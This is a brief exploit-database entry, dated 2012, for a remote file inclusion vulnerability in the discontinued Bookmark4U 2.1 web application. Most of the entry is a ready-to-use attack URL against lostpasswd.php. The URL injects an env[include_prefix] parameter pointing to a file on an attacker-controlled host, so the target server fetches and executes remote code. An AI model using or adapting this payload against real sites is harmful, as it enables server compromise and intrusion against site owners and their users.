Home / exploits Bookmark4U 2.1 Remote File Inclusion
Posted on 03 July 2012
vendor - http://bookmark4u.sourceforge.net/ version - 2.1 solution - product discontinued example - http://[target]/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://[attacker]/path/to/file.txt???